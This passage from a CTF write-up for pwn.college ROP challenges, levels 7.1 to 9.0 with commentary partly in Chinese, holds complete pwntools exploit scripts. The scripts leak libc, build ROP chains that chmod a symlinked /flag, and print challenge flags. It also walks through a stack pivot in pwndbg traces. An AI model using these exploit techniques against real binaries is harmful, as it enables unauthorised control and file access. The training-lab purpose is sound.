#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level7.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(leaked_addr):
    rop = ROP(elf)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    padding_to_ret = b"".ljust(0x48, b"A")

    libc.address = leaked_addr - libc.symbols["system"]

    filename = next(elf.search(b"GNU"))
    mode = 0o4

    pop_rdi_ret = rop.rdi.address
    pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address

    payload = padding_to_ret
    payload += flat(
        pop_rdi_ret,
        filename,
        pop_rsi_pop_r15_ret,
        mode,
        b"".ljust(0x8, b"A"),
        libc.symbols["chmod"],
    )

    return payload


def leak(target):
    target.recvuntil(b'"system" in libc is: ')

    return int(target.recv(14), 16)


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload(leak(target))

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{g7Ura4DbaSnnNgm8JQPQ2XM6c_l.0FN1MDL5cTNxgzW}

Level 8.0

Information

Category: Pwn

Description

ROP with libc, no free leak this time!

Write-up

这次没有 Level 7 那么愚蠢的泄漏了，需要我们自己想办法获取 libc 基地址。

不过思路很简单，我们先获取 elf.got["puts"] 在全局偏移表中的地址，然后通过 puts 函数泄漏这个地址指向的 puts 在 libc 中的实际地址。之后用它减去 libc.symbols["puts"] 就得到了 libc 基地址。程序也随之结束了，不过我们可以再次返回到 _start 重启整个程序，利用我们得到的基地址计算出 chmod 的实际地址，然后调用它。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level8.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *challenge+384
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage, leaked_addr=None):
    rop = ROP(elf)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    padding_to_ret = b"".ljust(0x38, b"A")

    pop_rdi_ret = rop.rdi.address
    pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address

    payload = padding_to_ret

    if stage == 1:
        payload += flat(
            pop_rdi_ret,
            elf.got["puts"],
            elf.plt["puts"],
            elf.symbols["_start"],
        )

        return payload
    elif stage == 2:
        libc.address = leaked_addr - libc.symbols["puts"]

        filename = next(elf.search(b"GNU"))
        mode = 0o4

        payload += flat(
            pop_rdi_ret,
            filename,
            pop_rsi_pop_r15_ret,
            mode,
            b"".ljust(0x8, b"A"),
            libc.symbols["chmod"],
        )

        return payload
    else:
        log.error("Incorrect stage number!")


def leak(target):
    target.recvuntil(b"Leaving!\x0a")

    return int.from_bytes(target.recv(0x6), "little")


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        payload = construct_payload(2, leak(target))

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload(1)

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{oFCQDFxRqfNOwKX3jCEn79BN5cC.0VN1MDL5cTNxgzW}

Level 8.1

Information

Category: Pwn

Description

ROP with libc, no free leak this time!

Write-up

参见 Level 8.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level8.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage, leaked_addr=None):
    rop = ROP(elf)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    padding_to_ret = b"".ljust(0x78, b"A")

    pop_rdi_ret = rop.rdi.address
    pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address

    payload = padding_to_ret

    if stage == 1:
        payload += flat(
            pop_rdi_ret,
            elf.got["puts"],
            elf.plt["puts"],
            elf.symbols["_start"],
        )

        return payload
    elif stage == 2:
        libc.address = leaked_addr - libc.symbols["puts"]

        filename = next(elf.search(b"GNU"))
        mode = 0o4

        payload += flat(
            pop_rdi_ret,
            filename,
            pop_rsi_pop_r15_ret,
            mode,
            b"".ljust(0x8, b"A"),
            libc.symbols["chmod"],
        )

        return payload
    else:
        log.error("Incorrect stage number!")


def leak(target):
    target.recvuntil(b"Leaving!\x0a")

    return int.from_bytes(target.recv(0x6), "little")


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        payload = construct_payload(2, leak(target))

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload(1)

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Q0NC7L0dteUeHqynz_c9HjT-w2R.0lN1MDL5cTNxgzW}

Level 9.0

Information

Category: Pwn

Description

Perform a stack pivot to gain control flow!

Write-up

这题得用栈迁移 (Stack pivot)，不错，新技巧++。

int __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  _QWORD v4[3]; // [rsp+0h] [rbp-40h] BYREF
  int v5; // [rsp+1Ch] [rbp-24h]
  __int64 *v6; // [rsp+30h] [rbp-10h]
  int v7; // [rsp+3Ch] [rbp-4h]
  __int64 savedregs; // [rsp+40h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+48h] [rbp+8h] BYREF

  v5 = a1;
  v4[2] = a2;
  v4[1] = a3;
  puts(
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
  sp_ = (__int64)v4;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("This challenge doesn't give you much to work with, so you will have to be resourceful.");
  puts("What you'd really like to know is the address of libc.");
  puts("In order to get the address of libc, you'll have to leak it yourself.");
  puts("An easy way to do this is to do what is known as a `puts(puts)`.");
  puts("The outer `puts` is puts@plt: this will actually invoke puts, thus initiating a leak.");
  puts("The inner `puts` is puts@got: this contains the address of puts in libc.");
  puts("Then you will need to continue executing a new ROP chain with addresses based on that leak.");
  puts("One easy way to do that is to just restart the binary by returning to its entrypoint.");
  puts("Previous challenges let you write your ROP chain directly onto the stack.");
  puts("This challenge is not so nice!");
  puts("Your input will be read to the .bss, and only a small part of it will be copied to the stack.");
  puts("You will need to figure out how to use stack pivoting to execute your full ropchain!");
  v7 = read(0, &unk_4150E0, 0x1000uLL);
  printf("Received %d bytes! This is potentially %d gadgets.\n", v7, v7 / 8);
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
  puts("from within this challenge. You will have to do that by yourself.");
  print_chain(&unk_4150E0, (unsigned int)(v7 / 8));
  v6 = &savedregs;
  memcpy(&retaddr, &unk_4150E0, 0x18uLL);
  printf("Of course, only %d bytes of the above ropchain was copied to the stack!\n", 24);
  puts("Let's take a look at just that part of the chain. To execute the rest, you'll have to pivot the stack!");
  print_chain(rp_, 3LL);
  return puts("Leaving!");
}

直接看调试吧：

Breakpoint 1, 0x000000000040266c in challenge ()
------- tip of the day (disable with set show-tips off) -------
Use track-got enable|info|query to track GOT accesses - useful for hijacking control flow via writable GOT/PLT
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0x7fffc71bc828 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e]
 RBX  0x7fffc71bc978 —▸ 0x7fffc71bd635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
 RCX  0x7ebc87f1b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x18
 RDI  0x7fffc71bc828 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e]
 RSI  0x4150e0 (data+65536) —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp
 R8   0x17bdf010 ◂— 0
 R9   7
 R10  0x17bdf780 ◂— 0x17bc8d1f
 R11  0x202
 R12  1
 R13  0
 R14  0x7ebc888ab000 (_rtld_global) —▸ 0x7ebc888ac2e0 ◂— 0
 R15  0
 RBP  0x7fffc71bc820 —▸ 0x7fffc71bc850 —▸ 0x7fffc71bc8f0 —▸ 0x7fffc71bc950 ◂— 0
 RSP  0x7fffc71bc7e0 —▸ 0x7fffc71bc820 —▸ 0x7fffc71bc850 —▸ 0x7fffc71bc8f0 —▸ 0x7fffc71bc950 ◂— ...
 RIP  0x40266c (challenge+409) ◂— call 0x401170
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x40266c <challenge+409>    call   memcpy@plt                  <memcpy@plt>
        dest: 0x7fffc71bc828 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e]
        src: 0x4150e0 (data+65536) —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp
        n: 0x18

   0x402671 <challenge+414>    mov    esi, 0x18               ESI => 0x18
   0x402676 <challenge+419>    lea    rdi, [rip + 0x108b]     RDI => 0x403708 ◂— 'Of course, only %d bytes of the above ropchain was...'
   0x40267d <challenge+426>    mov    eax, 0                  EAX => 0
   0x402682 <challenge+431>    call   printf@plt                  <printf@plt>

   0x402687 <challenge+436>    lea    rdi, [rip + 0x10ca]     RDI => 0x403758 ◂— "Let's take a look at just that part of the chain. ..."
   0x40268e <challenge+443>    call   puts@plt                    <puts@plt>

   0x402693 <challenge+448>    mov    rax, qword ptr [rip + 0x13a4e]     RAX, [rp_]
   0x40269a <challenge+455>    mov    esi, 3                             ESI => 3
   0x40269f <challenge+460>    mov    rdi, rax
   0x4026a2 <challenge+463>    call   print_chain                 <print_chain>
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffc71bc7e0 —▸ 0x7fffc71bc820 —▸ 0x7fffc71bc850 —▸ 0x7fffc71bc8f0 —▸ 0x7fffc71bc950 ◂— ...
01:0008│-038 0x7fffc71bc7e8 —▸ 0x7fffc71bc988 —▸ 0x7fffc71bd66a ◂— 'MOTD_SHOWN=pam'
02:0010│-030 0x7fffc71bc7f0 —▸ 0x7fffc71bc978 —▸ 0x7fffc71bd635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
03:0018│-028 0x7fffc71bc7f8 ◂— 0x1c71bc978
04:0020│-020 0x7fffc71bc800 —▸ 0x7fffc71bc978 —▸ 0x7fffc71bd635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
05:0028│-018 0x7fffc71bc808 ◂— 1
06:0030│-010 0x7fffc71bc810 —▸ 0x7fffc71bc820 —▸ 0x7fffc71bc850 —▸ 0x7fffc71bc8f0 —▸ 0x7fffc71bc950 ◂— ...
07:0038│-008 0x7fffc71bc818 ◂— 0x38888ab000
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x40266c challenge+409
   1         0x40275b main+165
   2   0x7ebc87e34e08
   3   0x7ebc87e34ecc __libc_start_main+140
   4         0x4011fe _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> i frame
Stack level 0, frame at 0x7fffc71bc830:
 rip = 0x40266c in challenge; saved rip = 0x40275b
 called by frame at 0x7fffc71bc860
 Arglist at 0x7fffc71bc820, args:
 Locals at 0x7fffc71bc820, Previous frame's sp is 0x7fffc71bc830
 Saved registers:
  rbp at 0x7fffc71bc820, rip at 0x7fffc71bc828
pwndbg> p/d 0x18
$1 = 24

在执行 memcpy 之前有一个 read，可以读取 0x1000 bytes 输入到数据段 0x4150e0 (data+65536)。

虽然大小足够大，但因为是读到数据段，所以我们不能通过 read 覆盖返回地址，那么很显然，问题就出这个 memcpy 上了。我们注意到它把数据从 0x4150e0 (data+65536) 复制到 0x7fffc71bc828，注意到这个地址正是我们的返回地址，但是它又限制了我们只能复制 0x18 bytes，也就是三条指令到 0x7fffc71bc828，故我们要是想直接把完整的 payload 通过一次 memcpy 执行完是不可能的。如此限制，有何破解之法？当然是栈迁移！通过栈迁移我们可以得到一个更大的空间来发挥，而不用受限于这小小的 0x18 bytes 的空间。

简单来讲一下栈迁移原理。我们知道 leave 指令实际上做的是：

mov rsp, rbp
pop rbp

那我们只要控制 rbp 指向我们想到的新的栈的地址，就实现了栈迁移，之后所有 gadgets 的操作都基于新的栈。至于后面那条 pop rbp 倒是无所谓，我们重点关注的是 rsp 的地址，因为一系列 gadgets 都是通过 ret 连接的，ret 做的就是 pop rip，这都有关于 rsp。

当然，可以实现栈迁移的方法不止 leave; ret 一种，能改变 rsp 的都可以想办法用来做栈迁移，这个自己悟去吧。

那么现在的问题是，迁移到哪里？首先肯定得是 rw 区吧，不然怎么实现 ROP。一个比较常见的方法应该是迁移到 .bss 段。pwntools 还是很方便的，通过 elf.bss() 即可得到当前程序的 .bss 段地址。

Breakpoint 1, 0x000000000040266c in challenge ()
------- tip of the day (disable with set show-tips off) -------
Want to display each context panel in a separate tmux window? See https://github.com/pwndbg/pwndbg/blob/dev/FEATURES.md#splitting--layouting-context
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0x7fff4c2cfca8 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e]
 RBX  0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
 RCX  0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x18
 RDI  0x7fff4c2cfca8 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e]
 RSI  0x4150e0 (data+65536) —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp
 R8   0x27643010 ◂— 0
 R9   7
 R10  0x27643780 ◂— 0x27664083
 R11  0x202
 R12  1
 R13  0
 R14  0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
 R15  0
 RBP  0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0
 RSP  0x7fff4c2cfc60 —▸ 0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— ...
 RIP  0x40266c (challenge+409) ◂— call 0x401170
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x40266c <challenge+409>    call   memcpy@plt                  <memcpy@plt>
        dest: 0x7fff4c2cfca8 —▸ 0x40275b (main+165) ◂— lea rdi, [rip + 0x107e]
        src: 0x4150e0 (data+65536) —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp
        n: 0x18

   0x402671 <challenge+414>    mov    esi, 0x18               ESI => 0x18
   0x402676 <challenge+419>    lea    rdi, [rip + 0x108b]     RDI => 0x403708 ◂— 'Of course, only %d bytes of the above ropchain was...'
   0x40267d <challenge+426>    mov    eax, 0                  EAX => 0
   0x402682 <challenge+431>    call   printf@plt                  <printf@plt>

   0x402687 <challenge+436>    lea    rdi, [rip + 0x10ca]     RDI => 0x403758 ◂— "Let's take a look at just that part of the chain. ..."
   0x40268e <challenge+443>    call   puts@plt                    <puts@plt>

   0x402693 <challenge+448>    mov    rax, qword ptr [rip + 0x13a4e]     RAX, [rp_]
   0x40269a <challenge+455>    mov    esi, 3                             ESI => 3
   0x40269f <challenge+460>    mov    rdi, rax
   0x4026a2 <challenge+463>    call   print_chain                 <print_chain>
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fff4c2cfc60 —▸ 0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— ...
01:0008│-038 0x7fff4c2cfc68 —▸ 0x7fff4c2cfe08 —▸ 0x7fff4c2d066a ◂— 'MOTD_SHOWN=pam'
02:0010│-030 0x7fff4c2cfc70 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
03:0018│-028 0x7fff4c2cfc78 ◂— 0x14c2cfdf8
04:0020│-020 0x7fff4c2cfc80 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
05:0028│-018 0x7fff4c2cfc88 ◂— 1
06:0030│-010 0x7fff4c2cfc90 —▸ 0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— ...
07:0038│-008 0x7fff4c2cfc98 ◂— 0x38a4fd4000
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x40266c challenge+409
   1         0x40275b main+165
   2   0x7d78a4634e08
   3   0x7d78a4634ecc __libc_start_main+140
   4         0x4011fe _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p/x $rsi
$1 = 0x4150e0
pwndbg> c
Continuing.

Breakpoint 2, 0x00000000004026b5 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  9
 RBX  0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
 RCX  0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
*RDX  0
*RDI  0x7d78a47f8710 ◂— 0
*RSI  0x7d78a47f7643 (_IO_2_1_stdout_+131) ◂— 0x7f8710000000000a /* '\n' */
*R8   0x20710
 R9   7
*R10  0x27643840 ◂— 0
 R11  0x202
 R12  1
 R13  0
 R14  0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
 R15  0
*RBP  0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0
*RSP  0x7fff4c2cfca8 —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp
*RIP  0x4026b5 (challenge+482) ◂— ret
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x4026b5 <challenge+482>               ret                                <__do_global_dtors_aux+29>
    ↓
   0x40129d <__do_global_dtors_aux+29>    pop    rbp     RBP => 0x4050a0 (stdout@@GLIBC_2.2.5)
   0x40129e <__do_global_dtors_aux+30>    ret                                <print_gadget+498>
    ↓
   0x4016ab <print_gadget+498>            leave
   0x4016ac <print_gadget+499>            ret                                <0>
    ↓



─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fff4c2cfca8 —▸ 0x40129d (__do_global_dtors_aux+29) ◂— pop rbp
01:0008│-020 0x7fff4c2cfcb0 —▸ 0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad2887
02:0010│-018 0x7fff4c2cfcb8 —▸ 0x4016ab (print_gadget+498) ◂— leave
03:0018│-010 0x7fff4c2cfcc0 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
04:0020│-008 0x7fff4c2cfcc8 ◂— 0x14c2cfdf8
05:0028│ rbp 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0
06:0030│+008 0x7fff4c2cfcd8 —▸ 0x7d78a4634e08 ◂— mov edi, eax
07:0038│+010 0x7fff4c2cfce0 —▸ 0x7fff4c2cfd20 —▸ 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x4026b5 challenge+482
   1         0x40129d __do_global_dtors_aux+29
   2         0x4050a0 stdout@@GLIBC_2.2.5
   3         0x4016ab print_gadget+498
   4   0x7d78a4634e08
   5   0x7d78a4634ecc __libc_start_main+140
   6         0x4011fe _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni
0x000000000040129d in __do_global_dtors_aux ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  9
 RBX  0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
 RCX  0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0
 RDI  0x7d78a47f8710 ◂— 0
 RSI  0x7d78a47f7643 (_IO_2_1_stdout_+131) ◂— 0x7f8710000000000a /* '\n' */
 R8   0x20710
 R9   7
 R10  0x27643840 ◂— 0
 R11  0x202
 R12  1
 R13  0
 R14  0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
 R15  0
 RBP  0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0
*RSP  0x7fff4c2cfcb0 —▸ 0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad2887
*RIP  0x40129d (__do_global_dtors_aux+29) ◂— pop rbp
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x4026b5 <challenge+482>               ret                                <__do_global_dtors_aux+29>
    ↓
 ► 0x40129d <__do_global_dtors_aux+29>    pop    rbp     RBP => 0x4050a0 (stdout@@GLIBC_2.2.5)
   0x40129e <__do_global_dtors_aux+30>    ret                                <print_gadget+498>
    ↓
   0x4016ab <print_gadget+498>            leave
   0x4016ac <print_gadget+499>            ret                                <0>
    ↓



─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fff4c2cfcb0 —▸ 0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad2887
01:0008│-018 0x7fff4c2cfcb8 —▸ 0x4016ab (print_gadget+498) ◂— leave
02:0010│-010 0x7fff4c2cfcc0 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
03:0018│-008 0x7fff4c2cfcc8 ◂— 0x14c2cfdf8
04:0020│ rbp 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0
05:0028│+008 0x7fff4c2cfcd8 —▸ 0x7d78a4634e08 ◂— mov edi, eax
06:0030│+010 0x7fff4c2cfce0 —▸ 0x7fff4c2cfd20 —▸ 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
07:0038│+018 0x7fff4c2cfce8 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x40129d __do_global_dtors_aux+29
   1         0x4050a0 stdout@@GLIBC_2.2.5
   2         0x4016ab print_gadget+498
   3   0x7d78a4634e08
   4   0x7d78a4634ecc __libc_start_main+140
   5         0x4011fe _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
0x000000000040129e in __do_global_dtors_aux ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  9
 RBX  0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
 RCX  0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0
 RDI  0x7d78a47f8710 ◂— 0
 RSI  0x7d78a47f7643 (_IO_2_1_stdout_+131) ◂— 0x7f8710000000000a /* '\n' */
 R8   0x20710
 R9   7
 R10  0x27643840 ◂— 0
 R11  0x202
 R12  1
 R13  0
 R14  0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
 R15  0
*RBP  0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad2887
*RSP  0x7fff4c2cfcb8 —▸ 0x4016ab (print_gadget+498) ◂— leave
*RIP  0x40129e (__do_global_dtors_aux+30) ◂— ret
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x4026b5 <challenge+482>               ret                                <__do_global_dtors_aux+29>
    ↓
   0x40129d <__do_global_dtors_aux+29>    pop    rbp     RBP => 0x4050a0 (stdout@@GLIBC_2.2.5)
 ► 0x40129e <__do_global_dtors_aux+30>    ret                                <print_gadget+498>
    ↓
   0x4016ab <print_gadget+498>            leave
   0x4016ac <print_gadget+499>            ret                                <0>
    ↓



─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fff4c2cfcb8 —▸ 0x4016ab (print_gadget+498) ◂— leave
01:0008│     0x7fff4c2cfcc0 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
02:0010│     0x7fff4c2cfcc8 ◂— 0x14c2cfdf8
03:0018│     0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0
04:0020│     0x7fff4c2cfcd8 —▸ 0x7d78a4634e08 ◂— mov edi, eax
05:0028│     0x7fff4c2cfce0 —▸ 0x7fff4c2cfd20 —▸ 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
